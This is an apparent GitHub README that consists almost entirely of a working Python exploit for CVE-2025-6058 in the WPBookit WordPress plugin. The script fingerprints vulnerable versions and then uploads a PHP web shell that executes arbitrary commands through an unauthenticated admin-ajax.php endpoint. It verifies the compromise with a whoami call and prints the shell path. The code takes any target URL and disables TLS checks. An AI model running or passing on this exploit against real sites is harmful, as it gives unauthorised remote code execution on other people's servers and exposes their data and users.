README.md
Rendering markdown...
import argparse
import requests
import re
import os
import sys
import time
from datetime import datetime
requests.packages.urllib3.disable_warnings()
def print_banner():
banner = r"""
______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______
/ \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \
/$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |
$$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ |
$$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$<
$$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ |
$$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ |
$$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/
$$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/
"""
print(banner)
print("Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited\n")
def format_url(url):
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
if url.endswith('/'):
url = url[:-1]
return url
def version_to_tuple(version):
return tuple(int(part) for part in version.split('.'))
def is_vulnerable_version(found_version, max_vulnerable="1.0.4"):
try:
return version_to_tuple(found_version) <= version_to_tuple(max_vulnerable)
except Exception:
return False
def get_version(url, session, headers):
print("[*] Checking plugin version ...")
time.sleep(3)
readme_url = f"{url}/wp-content/plugins/wpbookit/README.txt"
resp = session.get(readme_url, headers=headers, timeout=10)
if resp.status_code != 200:
return None
match = re.search(r"Stable tag:\s*([0-9.]+)", resp.text)
if not match:
return None
version = match.group(1).strip()
if is_vulnerable_version(version, "1.0.4"):
return version
else:
return None
def make_shell():
shell = '<?php if(isset($_REQUEST["cmd"])){system($_REQUEST["cmd"]);} ?>'
shell_name = "shell.php"
with open(shell_name, "w") as f:
f.write(shell)
return shell_name
def Nxploited(url, session, headers):
print("[*] Exploiting file upload ...")
time.sleep(2)
ajax_url = f"{url}/wp-admin/admin-ajax.php"
shell_file = make_shell()
with open(shell_file, 'rb') as f:
files = {
'cover_image_img': (shell_file, f, 'application/octet-stream')
}
data = {
'action': 'wpb_ajax_post',
'route_name': 'add_booking_type',
'title': 'Test',
'booking_type': 'Nxploited'
}
resp = session.post(ajax_url, headers=headers, files=files, data=data, timeout=15)
now = datetime.now()
shell_path = f"wp-content/uploads/{now.year}/{now.strftime('%m')}/shell.php?cmd=whoami"
check_url = f"{url}/{shell_path}"
check = session.get(check_url, headers=headers, timeout=10)
os.remove(shell_file)
if check.status_code == 200 and check.text.strip() and "whoami" not in check.text:
return shell_path
else:
return None
def main():
print_banner()
parser = argparse.ArgumentParser(description="CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)")
parser.add_argument("-u", "--url", required=True, help="Target URL e.g http(s)://target.com")
args = parser.parse_args()
session = requests.Session()
session.verify = False
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
}
url = format_url(args.url)
version = get_version(url, session, headers)
if not version:
print("[-] Target is not vulnerable or version could not be detected.")
sys.exit(1)
shell_path = Nxploited(url, session, headers)
if shell_path:
print(f"[+] Exploitation successful!")
print(f"[+] Shell path: {shell_path}")
print("Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited")
else:
print("[-] Exploitation failed or shell could not be confirmed.")
if __name__ == "__main__":
main()